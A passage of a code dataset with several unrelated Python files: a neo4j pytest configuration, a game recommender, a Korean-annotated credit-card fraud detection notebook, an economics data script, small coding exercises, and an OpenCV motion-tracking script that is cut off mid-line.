\"encrypted_only\" not in item.keywords:\n item.add_marker(skip_encrypted_only)\n else:\n skip_encrypted_only = pytest.mark.skip(reason=\"need --encrypted-only option to run\")\n for item in items:\n if \"encrypted_only\" in item.keywords:\n item.add_marker(skip_encrypted_only)\n\n if not config.getoption(\"--include-model-store-location\"):\n skip_stored_models = pytest.mark.skip(reason=\"need --include-model-store-location option to run\")\n for item in items:\n if \"model_store_location\" in item.keywords:\n item.add_marker(skip_stored_models)\n\n # `cloud-architecture` includes marked tests and excludes everything else\n if config.getoption(\"--include-cloud-architecture\"):\n skip_on_prem = pytest.mark.skip(reason=\"not marked as `cloud-architecture`\")\n for item in items:\n if \"cloud_architecture\" not in item.keywords:\n item.add_marker(skip_on_prem)\n else:\n skip_cloud_architecture = pytest.mark.skip(reason=\"need --include-cloud-architecture option to run\")\n for item in items:\n if \"cloud_architecture\" in item.keywords:\n item.add_marker(skip_cloud_architecture)\n\n gds = GraphDataScience(URI, auth=AUTH)\n\n try:\n server_version = gds._server_version\n except Exception as e:\n print(\"Could not derive GDS library server version\")\n gds.close()\n raise e\n\n gds.close()\n\n skip_incompatible_versions = pytest.mark.skip(reason=f\"incompatible with GDS server version {server_version}\")\n\n for item in items:\n for mark in item.iter_markers(name=\"compatible_with\"):\n kwargs = mark.kwargs\n\n if \"min_inclusive\" in kwargs and kwargs[\"min_inclusive\"] > server_version:\n item.add_marker(skip_incompatible_versions)\n continue\n\n if \"max_exclusive\" in kwargs and kwargs[\"max_exclusive\"] <= server_version:\n item.add_marker(skip_incompatible_versions)\n","repo_name":"neo4j/graph-data-science-client","sub_path":"graphdatascience/tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"94"} +{"seq_id":"27260204206","text":"import datetime\nimport itertools\nfrom collections import OrderedDict\nfrom math import ceil\n\n\nclass Recommender:\n\n def __init__(self):\n self.games = []\n self.user_activity = []\n self.n = 0\n\n def recommend(self, user_activity, games, n):\n self.games = games\n self.user_activity = user_activity\n self.n = n\n\n game_scores = self.__calculate_scores_for_games()\n recommendations = self.__choose_n_best_games(game_scores)\n\n return recommendations\n\n def __choose_n_best_games(self, game_scores):\n sorted_game_scores = sorted(game_scores.items(), key=lambda x: x[1], reverse=True)\n return [score[0] for score in sorted_game_scores[:self.n]]\n\n def __calculate_scores_for_games(self):\n game_scores = {}\n for game in self.games:\n max_score = 0\n for activity in self.user_activity:\n user_activity_game = self.__get_game_by_id(activity.game_id)\n if user_activity_game.id == game.id:\n continue\n similarity = self.__get_genre_similarity(game, user_activity_game)\n page_visit_score = self.__get_page_visit_scores(activity)\n delta = self.__get_delta(activity, user_activity_game)\n score = (similarity + page_visit_score) * delta\n max_score += score\n game_scores[game] = max_score\n return game_scores\n\n def __get_delta(self, activity, user_activity_game):\n today = datetime.datetime.today()\n days_since_last_activity = (today - activity.last_update).total_seconds() / 60 / 60 / 24\n positive_proportion = \\\n user_activity_game.num_of_positive_reviews / (user_activity_game.num_of_positive_reviews + user_activity_game.num_of_negative_reviews)\n return (1/(1+days_since_last_activity) + positive_proportion)/2\n\n def __get_page_visit_scores(self, activity):\n page_visit_score = activity.page_entries + activity.steam_store_visits * 2\n return page_visit_score\n\n def __get_genre_similarity(self, game1, game2):\n similarity = 0\n for genre1 in game1.genres:\n for genre2 in game2.genres:\n if genre1.name == genre2.name:\n similarity += 1\n return similarity/float(len(game1.genres) + len(game2.genres))\n\n def __get_game_by_id(self, id):\n for game in self.games:\n if game.id == id:\n return game\n return None\n","repo_name":"LEFTazs/recommender-algorithm-steam","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39234101752","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### 데이터 일차 가공 및 모델 학습/예측/평가\n# \n# ** 데이터 로드 **\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ncard_df = pd.read_csv('C:/jeon/creditcard.csv')\ncard_df.head(3)\n\nprint(card_df.info()) #null값 없음. 'Class' column만 int, 나머지는 float\ntest = card_df.describe() #'Class' column 보니까 값이 0과 1 뿐일 확률이 있구나!\nprint(card_df['Class'].value_counts()) #그게 맞다! +극단적으로 1에 해당하는 데이터가 적구나(사기case니까 당연)\n\n# In[2]:\n\n\nprint(card_df.shape)\n\n\n# ** 원본 DataFrame은 유지하고 데이터 가공을 위한 DataFrame을 복사하여 반환 **\n\n# In[3]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n# 인자로 입력받은 DataFrame을 복사 한 뒤 Time 컬럼만 삭제하고 복사된 DataFrame 반환\ndef get_preprocessed_df(df=None):\n df_copy = df.copy() #복사본\n df_copy.drop('Time', axis=1, inplace=True) #정확한 어떤 정보인지는 고객정보니까 알려주지 않았지만, 그냥 계속 증가하는데 별 의미 없어 보임. 그래서 걍 삭제.\n return df_copy\n\n\n# ** 학습과 테스트 데이터 세트를 반환하는 함수 생성. 사전 데이터 처리가 끝난 뒤 해당 함수 호출 **\n\n# In[4]:\n\n\n# 사전 데이터 가공 후 학습과 테스트 데이터 세트를 반환하는 함수.\ndef get_train_test_dataset(df=None):\n # 인자로 입력된 DataFrame의 사전 데이터 가공이 완료된 복사 DataFrame 반환\n df_copy = get_preprocessed_df(df)\n \n # DataFrame의 맨 마지막 컬럼이 레이블, 나머지는 피처들\n X_features = df_copy.iloc[:, :-1]\n y_target = df_copy.iloc[:, -1]\n \n # train_test_split( )으로 ���습과 테스트 데이터 분할. stratify=y_target으로 Stratified 기반 분할\n X_train, X_test, y_train, y_test = train_test_split(X_features, y_target, test_size=0.3, random_state=0, stratify=y_target)\n \n # 학습과 테스트 데이터 세트 반환\n return X_train, X_test, y_train, y_test\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\n\n# In[5]:\n\n\nprint('학습 데이터 레이블 값 비율')\nprint(y_train.value_counts()/y_train.shape[0] * 100)\nprint('테스트 데이터 레이블 값 비율')\nprint(y_test.value_counts()/y_test.shape[0] * 100)\n\n\n# In[6]:\n\n\nfrom sklearn.metrics import confusion_matrix, accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.metrics import roc_auc_score\n\n# 수정된 get_clf_eval() 함수 \ndef get_clf_eval(y_test, pred=None, pred_proba=None):\n confusion = confusion_matrix( y_test, pred)\n accuracy = accuracy_score(y_test , pred)\n precision = precision_score(y_test , pred)\n recall = recall_score(y_test , pred)\n f1 = f1_score(y_test,pred)\n # ROC-AUC 추가 \n roc_auc = roc_auc_score(y_test, pred_proba)\n print('오차 행렬')\n print(confusion)\n '''\n [[85282 13]\n [ 56 92]]\n 정확도: 0.9992, 정밀도: 0.8762, 재현율: 0.6216, F1: 0.7273, AUC:0.9582\n 카드사기이기 때문에 재현율이 낮으면 안됨. FN(사기가 Positive인데 Negative라고 잘못 예측하면 x!!)\n '''\n # ROC-AUC print 추가\n print('정확도: {0:.4f}, 정밀도: {1:.4f}, 재현율: {2:.4f}, F1: {3:.4f}, AUC:{4:.4f}'.format(accuracy, precision, recall, f1, roc_auc))\n\n\n# In[7]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr_clf = LogisticRegression()\n\nlr_clf.fit(X_train, y_train)\n\nlr_pred = lr_clf.predict(X_test)\nlr_pred_proba = lr_clf.predict_proba(X_test)[:, 1]\n\n# 3장에서 사용한 get_clf_eval() 함수를 이용하여 평가 수행. \nget_clf_eval(y_test, lr_pred, lr_pred_proba)\n\n\n# ** 앞으로 피처 엔지니어링을 수행할 때마다 모델을 학습/예측/평가하므로 이를 위한 함수 생성 ** \n\n# In[8]:\n\n\n# 인자로 사이킷런의 Estimator객체와, 학습/테스트 데이터 세트를 입력 받아서 학습/예측/평가 수행.\ndef get_model_train_eval(model, ftr_train=None, ftr_test=None, tgt_train=None, tgt_test=None):\n model.fit(ftr_train, tgt_train)\n pred = model.predict(ftr_test)\n pred_proba = model.predict_proba(ftr_test)[:, 1]\n get_clf_eval(tgt_test, pred, pred_proba)\n '''\n 아래에서 LightGbm 써서 오차행렬 보여주니까\n [[85290 5]\n [ 36 112]]\n 정확도: 0.9995, 정밀도: 0.9573, 재현율: 0.7568, F1: 0.8453, AUC:0.9790\n 재현율 확 올라감. 게다가 정밀도까지 올라감. \n '''\n\n\n# ** LightGBM 학습/예측/평가.**\n# \n# (boost_from_average가 True일 경우 레이블 값이 극도로 불균형 분포를 이루는 경우 재현률 및 ROC-AUC 성능이 매우 저하됨.) \n# LightGBM 2.1.0 이상 버전에서 이와 같은 현상 발생 \n\n# In[9]:\n\n\nfrom lightgbm import LGBMClassifier\n\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False) #n_jobs=-1: estimator 돌릴 때 모든 cpu 사용해서 한번에 돌려주세요~ 컴퓨터는 느려지지만 속도 빨라짐!\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ### 중요 데이터 분포도 변환 후 모델 학습/예측/평가\n# \n\n# ** 중요 feature의 분포도 확인 **\n\n# In[10]:\n\n\nimport seaborn as sns\n\nplt.figure(figsize=(8, 4))\nplt.xticks(range(0, 30000, 1000), rotation=60) #rotation=60 : x축 좌표 표기들을 60도 각도 틀어서 써줌\nsns.distplot(card_df['Amount']) #Amount : 신용카드 결제 금액. 결제 금액 별 금융사기가 발생한 히스토그램(distplot:몇번 발생했는지 도수분포)\n #kde=True로 default. --> 히스토그램의 밀도 추세 곡선(연속된 값으로) 그려줌. 얘는 금액이기 때문에 이산적인 값이 아니라 연속된 값으로 봐야 함. \n #이산적인 값 : 확률질량함수\n #연속된 값 : 적분!(dx : x를 굉장히 작게 자른 한 부분) -> 확률밀도함수\n# ** 데이터 사전 가공을 위한 별도의 함수에 StandardScaler를 이용하여 Amount 피처 변환 **\n\n# In[11]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n# 사이킷런의 StandardScaler를 이용하여 정규분포 형태로 Amount 피처값 변환하는 로직으로 수정. \ndef get_preprocessed_df(df=None):\n df_copy = df.copy()\n scaler = StandardScaler()\n amount_n = scaler.fit_transform(df_copy['Amount'].values.reshape(-1, 1)) #fit_transform() 안에 가로로 된 series(1차원 데이터)가 아닌 세로로 된 2차원 데이터가 들어가주어야 해서 reshape해줌. \n \n # 변환된 Amount를 Amount_Scaled로 피처명 변경후 DataFrame맨 앞 컬럼으로 입력\n df_copy.insert(0, 'Amount_Scaled', amount_n) #cf. append는 맨 뒤에만 갖다 붙일 수 있다. \n \n # 기존 Time, Amount 피처 삭제\n df_copy.drop(['Time','Amount'], axis=1, inplace=True) #Time은 애초에 의미 없었고, 기존의 Amount도 필요 없어졌으므로 drop\n return df_copy\n\n\n# ** StandardScaler 변환 후 로지스틱 회귀 및 LightGBM 학습/예측/평가 **\n\n# In[12]:\n\n\n# Amount를 정규분포 형태로 변환 후 로지스틱 회귀 및 LightGBM 수행. \nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### 로지스틱 회귀 예측 성능 ###')\nlr_clf = LogisticRegression()\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM 예측 성능 ###')\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False)\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ** Amount를 로그 변환 **\n\n# In[13]:\n\n\ndef get_preprocessed_df(df=None):\n df_copy = df.copy()\n # 넘파이의 log1p( )를 이용하여 Amount를 로그 변환 \n amount_n = np.log1p(df_copy['Amount'])\n df_copy.insert(0, 'Amount_Scaled', amount_n)\n df_copy.drop(['Time','Amount'], axis=1, inplace=True)\n return df_copy\n\n\n# In[14]:\n\n\n# log1p 와 expm1 설명 \n'''\nLog Scale\n: 데이터 차이가 극단적으로 차이 많이 나는 경우 log 취해주면 한결 보기 편해짐\nex_ x = 1,000,000 10,000 100 10 → 그래프 그리면 1,000,000을 제외하고 모두 다닥다닥 바닥에 붙어버림\n log(x) = 6 4 2 1\nlog1p\n: log(1+x) 사용. log(1)==0이므로 log scale 결괏값이 음수가 나오지 않게 하기 위해 1+x를 넣어줌. \n'''\nimport numpy as np\n\nprint(1e-1000 == 0.0)\n\nprint(np.log(1e-1000))\n\nprint(np.log(1e-1000 + 1))\nprint(np.log1p(1e-1000))\n\n\n# In[15]:\n\n\nvar_1 = np.log1p(100)\nvar_2 = np.expm1(var_1)\nprint(var_1, var_2)\n\n\n# In[16]:\n\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### 로지스틱 회귀 예측 성능 ###')\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM 예측 성능 ###')\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ### 이상치 데이터 제거 후 모델 학습/예측/평가\n\n# ** 각 피처들의 상관 관계를 시각화. 결정 레이블인 class 값과 가장 상관도가 높은 피처 추출 **\n\n# In[21]:\n\n\nimport seaborn as sns\n\nplt.figure(figsize=(9, 9))\ncorr = card_df.corr() \n'''\ncorr() : 상관계수\ncolumn1이 1-2-3-4-5-6 증가하는데 column2도 2-4-6-8-10-12 같이 증가하는 경향성을 보인다면 '양의 상관관계가 있으며 상관계수는 1이다'\n\n완전 똑같이 움직이면 corr() = 1\n완전 반대로 움직이면 corr() = -1 (어쨌든 얘도 상관관계가 ↑높은↑ 것!!)\n방향은 같은데 정도가 다르면 소수점. corr() = 0.~~\n하나는 바뀌는데 하나는 값의 변화가 없다면 corr() = 0\n'''\nsns.heatmap(corr, cmap='RdBu') #\n'''\n시각화. 각 피처별로 모든 상관도 관계성을 보여줌. \nRdBu : Red-down Blue-up. 자신과 자신의 corr()값은 1이므로 가장 진한 파란색으로 표현. \n\n'Class'와 어떤 다른 column이 양의 상관관계/음의 상관관계가 있는 것이 있나?\n=> V14, V17이 그나마 음의 상관관계가 진하다!\n=> 그럼 얘네한테서 이상치(Outlier) 제거해주는 게 의미가 있겠구나!\n'''\n\n\n# ** Dataframe에서 outlier에 해당하는 데이터를 필터링하기 위한 함수 생성. outlier 레코드의 index를 반환함. **\n\n# In[30]:\n\n\nimport numpy as np\n\ndef get_outlier(df=None, column=None, weight=1.5): #이상치(Outlier) 인덱스 리턴 함수\n # fraud에 해당하는 column 데이터만 추출, 1/4 분위와 3/4 분위 지점을 np.percentile로 구함. \n fraud = df[df['Class']==1][column]\n quantile_25 = np.percentile(fraud.values, 25)\n quantile_75 = np.percentile(fraud.values, 75)\n \n # IQR을 구하고, IQR에 1.5를 곱하여 최대값과 최소값 지점 구함. \n iqr = quantile_75 - quantile_25\n iqr_weight = iqr * weight\n lowest_val = quantile_25 - iqr_weight\n highest_val = quantile_75 + iqr_weight\n \n # 최대값 보다 크거나, 최소값 보다 작은 값을 boolean index로 접근해서 아웃라이어로 설정하고 걔네의 DataFrame index만을 반환. \n outlier_index = fraud[(fraud < lowest_val) | (fraud > highest_val)].index\n \n return outlier_index\n'''\n[시각화 - 박스 플롯]\n이상치 : 최댓값 이상\n최댓값 : 3/4 + 1.5*IQR\nIQR : 3/4, Q3(75%) //IQR = Q1+Q2+Q3. 사분위(Quantile)값의 편차\n 2/4, Q2(50%)\n 1/4, Q1(25%)\n최솟값 : 1/4 - 1.5*IQR\n이상치 : 최솟값 이하\n'''\n\n\n# In[28]:\n\n\n#np.percentile(card_df['V14'].values, 100)\nnp.max(card_df['V14'])\n\n\n# In[31]:\n\n\noutlier_index = get_outlier(df=card_df, column='V14', weight=1.5)\nprint('이상치 데이터 인덱스:', outlier_index)\n\n\n# **로그 변환 후 V14 피처의 이상치 데이터를 삭제한 뒤 모델들을 재 학습/예측/평가**\n\n# In[32]:\n\n\n# get_processed_df( )를 로그 변환 후 V14 피처의 이상치 데이터를 삭제하는 로직으로 변경. \ndef get_preprocessed_df(df=None):\n df_copy = df.copy()\n amount_n = np.log1p(df_copy['Amount'])\n df_copy.insert(0, 'Amount_Scaled', amount_n) #아까랑 똑같이 Amount_Scaled\n df_copy.drop(['Time','Amount'], axis=1, inplace=True)\n \n # 이상치 데이터 삭제하는 로직 추가\n outlier_index = get_outlier(df=df_copy, column='V14', weight=1.5)\n df_copy.drop(outlier_index, axis=0, inplace=True) #axis=0 : 로우방향. 로우를 날려줌. \n return df_copy\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### 로지스틱 회귀 예측 성능 ###')\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM 예측 성능 ###')\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n'''\n[[85290 5]\n [ 25 121]]\n정확도: 0.9996, 정밀도: 0.9603, 재현율: 0.8288, F1: 0.8897, AUC:0.9780\n=> 재현율: 아까 최대로 올린 0.7635에서 0.8288까지 확 올라옴! FN이 확 줄었구나. \n\n근데 outlier 삭제해서 더 안 좋아지는 경우도 있음. 모든 게 다 케바케. \n'''\n\n# ### SMOTE 오버 샘플링 적용 후 모델 학습/예측/평가\n\n# In[33]:\n\n\nfrom imblearn.over_sampling import SMOTE\n\nsmote = SMOTE(random_state=0)\nX_train_over, y_train_over = smote.fit_resample(X_train, y_train)\nprint('SMOTE 적용 전 학습용 피처/레이블 데이터 세트: ', X_train.shape, y_train.shape)\nprint('SMOTE 적용 후 학습용 피처/레이블 데이터 세트: ', X_train_over.shape, y_train_over.shape)\nprint('SMOTE 적용 후 레이블 값 분포: \\n', pd.Series(y_train_over).value_counts())\n\n\n# In[34]:\n\n\nprint(y_train.value_counts())\n\n\n# ** 로지스틱 회귀로 학습/예측/평가 **\n\n# In[35]:\n\n\nlr_clf = LogisticRegression()\n# ftr_train과 tgt_train 인자값이 SMOTE 증식된 X_train_over와 y_train_over로 변경됨에 유의\nget_model_train_eval(lr_clf, ftr_train=X_train_over, ftr_test=X_test, tgt_train=y_train_over, tgt_test=y_test)\n'''\n[[82937 2358]\n [ 11 135]]\n정확도: 0.9723, 정밀도: 0.0542, 재현율: 0.9247, F1: 0.1023, AUC:0.9737\n=> 오버샘플링으로 재현율을 좋아졌지만, 정밀도가 5%로 크게 줄어들음. 원래도 재현율, 정밀도가 trade-off 관계였지만 이번엔 좀 심함\n'''\n\n# ** Precision-Recall 곡선 시각화 **\n\n# In[36]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nfrom sklearn.metrics import precision_recall_curve\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndef precision_recall_curve_plot(y_test , pred_proba_c1):\n # threshold ndarray와 이 threshold에 따른 정밀도, 재현율 ndarray 추출. \n precisions, recalls, thresholds = precision_recall_curve( y_test, pred_proba_c1)\n \n # X축을 threshold값으로, Y축은 정밀도, 재현율 값으로 각각 Plot 수행. 정밀도는 점선으로 표시\n plt.figure(figsize=(8,6))\n threshold_boundary = thresholds.shape[0]\n plt.plot(thresholds, precisions[0:threshold_boundary], linestyle='--', label='precision')\n plt.plot(thresholds, recalls[0:threshold_boundary],label='recall')\n \n # threshold 값 X 축의 Scale을 0.1 단위로 변경\n start, end = plt.xlim()\n plt.xticks(np.round(np.arange(start, end, 0.1),2))\n \n # x축, y축 label과 legend, 그리고 grid 설정\n plt.xlabel('Threshold value'); plt.ylabel('Precision and Recall value')\n plt.legend(); plt.grid()\n plt.show()\n \n\n\n# In[37]:\n\n\nprecision_recall_curve_plot( y_test, lr_clf.predict_proba(X_test)[:, 1] )\n#지금 왜 정밀도가 그렇게 낮은지. 로지스틱 회귀 모델에 어떤 문제가 발생하고 있는지 확인하기 위해 재현율, 정밀도 그래프 그리기.\n\n\n# ** LightGBM 모델 적용!!!! **\n\n# In[38]:\n\n\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False)\nget_model_train_eval(lgbm_clf, ftr_train=X_train_over, ftr_test=X_test,\n tgt_train=y_train_over, tgt_test=y_test)\n'''\n[[85283 12]\n [ 22 124]]\n정확도: 0.9996, 정밀도: 0.9118, 재현율: 0.8493, F1: 0.8794, AUC:0.9814\n=> LightGBM 모델로 SMOTE로 오버샘플링된 데이터를 학습/예측/평가하니까\n 정밀도는 사알짝 줄었지만 재현율도 엄청 오름. 정밀도, 재현율이 우수함!!\n=> 물론 신용카드 사기 검출 모델은 재현율이 훨씬 중요하지만, 아무리 그래도 아까 정밀도가 5%인 것은 좀 아니었다^^\n 카드 긁을 때마다 매번 \"본인이 결제하시는 것 맞으세요?\" 확인전화 오면 안 됨. 실생활 적용 불가능. \n'''\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kjeon0901/python-spider-machinelearning","sub_path":"python_code/ML_all_codes_per_chapters/4.9 분류 실습-신용카드_사기검출.py","file_name":"4.9 분류 실습-신용카드_사기검출.py","file_ext":"py","file_size_in_byte":17021,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31703718368","text":"#!/usr/bin/env conda run -n jpandas python\n# -*- coding: utf-8 -*-\n\nimport params\nimport pandas as pd\nfrom . import prd_funcs as func\n\n\ndef main(input_folder, output_folder):\n # read csv file\n file_cap = input_folder + 'post_cap.csv'\n file_GDP = input_folder + 'post_GDP.csv'\n df_cap = pd.read_csv(file_cap)\n df_GDP = pd.read_csv(file_GDP)\n\n # divide by 1000 to make the unit common.\n # GDP is in billions of yen\n # Capital is in millions of yen\n denom = 1000\n\n columns = ['tot_cap', 'prm_cap', 'non_prm_cap']\n for column in columns:\n df_cap[column] = df_cap[column] / denom\n\n # Change the data type to merge the data frames\n df_cap['year_jpn'] = df_cap['year_jpn'].astype(str)\n df_GDP['year_jpn'] = df_GDP['year_jpn'].astype(str)\n\n df = df_cap.merge(df_GDP, on='year_jpn').copy()\n\n alphaKA = params.alphaKA\n alphaKM = params.alphaKM\n\n df = func.create_cap_prd_ratio(df, alphaKA, alphaKM)\n df = func.create_cap_ratio(df)\n df = func.create_output_ratio(df)\n\n # Save the dataframe to a csv file\n file_name = 'post_cap_prd_ratio.csv'\n output = output_folder + file_name\n\n df.to_csv(output, index=False)\n\n\nif __name__ == '__main__':\n input_folder = '../../Data/Downloads/Post/'\n output_folder = ''\n main(input_folder, output_folder)\n","repo_name":"Satoshi-Matsuzawa/Wedge-Accounting","sub_path":"Python/Analysis/Production/post_cap_prd_ratio.py","file_name":"post_cap_prd_ratio.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34410732697","text":"# Cuenta los cuplicados:\n\n# Indica cuantas letras estan duplicadas en una string\n\ndef duplicate_count(text):\n text1 = text.lower()\n repeat = ''\n for i in text1:\n x = text1.count(i)\n if x >= 2:\n repeat += i\n else:\n continue\n return len(set(repeat))\n\nprint(duplicate_count(\"abcdeaB\"))\n\n# Mejor codigo:\n\"\"\"\nMediante compresión de listas es mas limpio el codigo, en este caso se crea una lista con\nla string en formato set, para indicar las letras unicas, y solo se añaden mediante el control if\nque si estan presentes en mas de una ocasión, se añaden a la lista. Con len se cuentan cuantas hay.\nTambien se pueden obtener que letras se repiten, quitando el len.\n\"\"\"\n\ns = 'abcdeaB'\n\ndef duplicate_count(s):\n return len([i for i in set(s.lower()) if s.lower().count(i)>1])\n\n\n\n# Codigo intermedio antes del final\n\ny = [] # lista las letras repetidas\n\nx = [i for i in set(s.lower()) if s.lower().count(i)>1]\nfor i in set(s.lower()): # el for itera sobre las letras unicamente\n if s.lower().count(i)>1: # esto añade a la lista solo las letras que se cuenten en mas de una ocasion en la string original.\n y.append(i) # añade a la lista\n\nprint(y) # letras repetidas\nprint(len(y)) # cuantas letras repetidas hay\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Usrg30/CodeWars","sub_path":"CodeWars_con_notas/ContarDuplicados.py","file_name":"ContarDuplicados.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11324283747","text":"def powersum(power,*args):\n '''Return the sum of each argument raised to specified power.'''\n total=0\n for i in args:\n total+=pow(i,power)\n print(total)\n return total\n print('total:%d',total)\n\npowersum(2,3,4)\npowersum(2,10)\n","repo_name":"StoneZhu2017/learning-python","sub_path":"Scripts/test_0813.py","file_name":"test_0813.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25492473479","text":"import numpy as np\r\nimport cv2\r\n\r\ndef init_feature(cap): #初始化特徵點\r\n #設定特徵取樣參數\r\n feature_params = dict( maxCorners = 100, qualityLevel =0.3, minDistance =7, blockSize =7)\r\n lk_params = dict(winSize = (15,15), maxLevel = 5, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT,10,0.03))\r\n color = np.random.randint(0,255,(100,3)) #隨機色彩\r\n \r\n ret, old_frame = cap.read() #讀取影片\r\n \r\n old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY) #轉灰階\r\n \r\n \r\n x,y= old_gray.shape #取得frame大小\r\n \r\n \r\n mask1 = np.zeros([x, y], dtype=np.uint8) #新增遮罩陣列\r\n mask1[50:300, 600:y-50] = 255 #設定特徵取樣範圍\r\n \r\n #cv2.imshow(\"mask1\", mask1) #顯示遮罩\r\n #cv2.waitKey(0)\r\n\r\n old_gray1 = cv2.add(old_gray, np.zeros(np.shape(old_gray), dtype=np.uint8), mask=mask1)\r\n cv2.imshow(\"image\", old_gray1) #顯示遮罩後照片\r\n #cv2.waitKey(0)\r\n \r\n p0 = cv2.goodFeaturesToTrack(old_gray1, mask =None, **feature_params) #取特徵點\r\n #print(p0)\r\n mask = np.zeros_like(old_frame)\r\n #cap.release()\r\n \r\n return feature_params,lk_params,color,old_gray,p0,mask\r\n\r\n\r\ndef tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask):\r\n count = 0\r\n \r\n \r\n while(1):\r\n \r\n \r\n ret,frame = cap.read()\r\n \r\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) \r\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\r\n\r\n if not st is None:\r\n good_new = p1[st==1]\r\n good_old = p0[st==1]\r\n if st is None: #特徵點已移出畫面, 重新擷取特徵點\r\n feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap) \r\n tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask)\r\n \r\n ''' \r\n #設定更新特徵點\r\n if count > 120:\r\n #cap.release()\r\n print('Stop Move')\r\n count = 0\r\n move_flag = 0\r\n feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap)\r\n #tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask)\r\n ''' \r\n \r\n \r\n total_data_x = []\r\n total_data_y = []\r\n count_i = 1\r\n for i,(new,old) in enumerate(zip(good_new,good_old)):\r\n a,b = new.ravel()\r\n c,d = old.ravel()\r\n #print(str(i)+',a-c')\r\n #print(a-c)\r\n #print(str(i)+',b-d')\r\n #print(b-d)\r\n count_i +=1\r\n total_data_x.append((a-c))\r\n total_data_y.append((b-d))\r\n mask = cv2.line(mask, (a,b),(c,d),color[i].tolist(),2) #畫移動軌跡線\r\n frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1) #畫特徵點\r\n \r\n #print('X Value: '+str(total_data_x/count_i))\r\n #print('Y Value: '+str(total_data_y/count_i))\r\n if len(total_data_x) > 0:\r\n x_mean = sum(total_data_x)/len(total_data_x)\r\n y_mean = sum(total_data_y)/len(total_data_y)\r\n\r\n img = cv2.add(frame,mask) #顯示特徵移動軌跡\r\n \r\n if (x_mean) > 0.05 and not st is None:\r\n print('Move forward')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n \r\n if (y_mean) < -3.9 and (x_mean) < 0.05 and not st is None:\r\n print('Turn left')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'Turn left',(500, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n print('y value:'+str(y_mean))\r\n\r\n if (y_mean) > -2.5 and (x_mean) < 0.05 and not st is None:\r\n print('Turn right')\r\n cv2.putText(img,'Move forward',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'Turn right',(500, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n print('y value:'+str(y_mean))\r\n \r\n if (x_mean) < 0.01 and x_mean > -0.01 and (y_mean) < 0.01 and not st is None and (x_mean) != 0:\r\n print('Stop Move')\r\n cv2.putText(img,'Stop Move',(500, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, 